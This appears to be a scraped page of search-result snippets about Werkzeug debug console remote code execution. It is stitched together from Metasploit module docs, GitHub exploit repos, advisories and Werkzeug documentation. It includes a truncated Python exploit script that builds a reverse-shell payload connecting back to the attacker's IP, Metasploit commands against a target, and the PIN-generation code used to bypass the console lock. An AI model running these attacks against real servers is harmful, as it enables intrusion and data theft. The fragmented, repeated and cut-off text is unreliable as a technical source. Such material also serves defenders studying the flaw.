This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.

January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%

Do: set FLASKPATH /usr/local/lib/<python3.version>/site-packages/flask/app.py (where <python3.version> matches the version on the system being exploited) ... You should see a failure due to the check failing. Method of authentication. Valid values are: generated-cookie: Cookie generated from information provided about the application's environment. When this mode is used, the following additional options must be set: APPNAME: The name of the application according to Werkzeug. This is often Flask, DebuggedApplication or wsgi_app.

Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.

May 5, 2024 - The debugger in affected versions of Werkzeug can allow an attacker to execute code on a developer's machine under some circumstances. This requires the attacker to get the developer to interact wi...

This indicates an attack attempt to exploit a Remote Code Execution in Werkzeug Debug Console. The vulnerability is caused by a design weakness when the target application handles a maliciously crafted debug command.

Werkzeug has a debug console that requires a pin by default. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector.

A message regarding the “console locked” scenario is encountered when attempting to access Werkzeug’s debug interface, indicating a requirement for a PIN to unlock the console. The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py).

People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.

This is a security helper to make it less likely for the debugger to be exploited if you forget to disable it when deploying to production. The PIN based authentication is enabled by default. The first time a console is opened, a dialog will prompt for a PIN that is printed to the command line.

December 4, 2022 - A sample application which enables the console debugger is available here ... Do: check [+] 10.108.106.201:8081 - The target is vulnerable. ... You should get a shell. ... TARGETURI by default is /console, as defined by werkzeug, however it can be changed within the python script. Example utilizing the previously mentioned sample app listed above. msf > use exploit/multi/http/werkzeug_debug_rce msf exploit(werkzeug_debug_rce) > set rport 8081 rport => 8081 msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201 rhost => 10.108.106.201 msf exploit(werkzeug_debug_rce) > check [+] 10.108.106.201:8081 - The target is vulnerable.

November 10, 2024 - GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.

These exploits were developed after reviewing Werkzeug source code repo to better understand how the code is generated to then reverse it. The following is the function that generates the pin in Werkzeug from __init__.py. def get_pin_and_cookie_name(app): pin = os.environ.get('WERKZEUG_DEBUG_PIN') rv = None num = None # Pin was explicitly disabled if pin == 'off': return None, None # Pin was provided explicitly if pin is not None and pin.replace('-', '').isdigit(): # If there are separators in the pin, return it directly if '-' in pin: rv = pin else: num = pin modname = getattr(app, '__module__', getattr(app.__class__, '__module__')) try: # `getpass.getuser()` imports the `pwd` module, # which does not exist in the Google App Engine sandbox.

February 18, 2020 - A publicly exposed debugger will subject the machine to remote code execution. Once attackers can execute arbitrary Python code on the server, she can directly leak all the sensitive data stored on the server.

Collection of different exploits. Contribute to am0nsec/exploit development by creating an account on GitHub.

August 18, 2015 - ## # This module requires Metasploit: ... Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....

This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.

Werkzeug provides a WSGI middleware that renders nice tracebacks, optionally with an interactive debug console to execute code in any frame. This console functionality can be abused by attackers to run commands ...

December 7, 2024 - However, during development and debugging, it can expose sensitive functionalities that attackers might exploit, especially if the application is running in a non-production environment.

September 30, 2021 - You can find the PIN printed out on the standard output of your shell that runs the server · Locate vulnerable Werkzeug debug console at path vulnerable-site.com/console, but is locked by secret PIN number.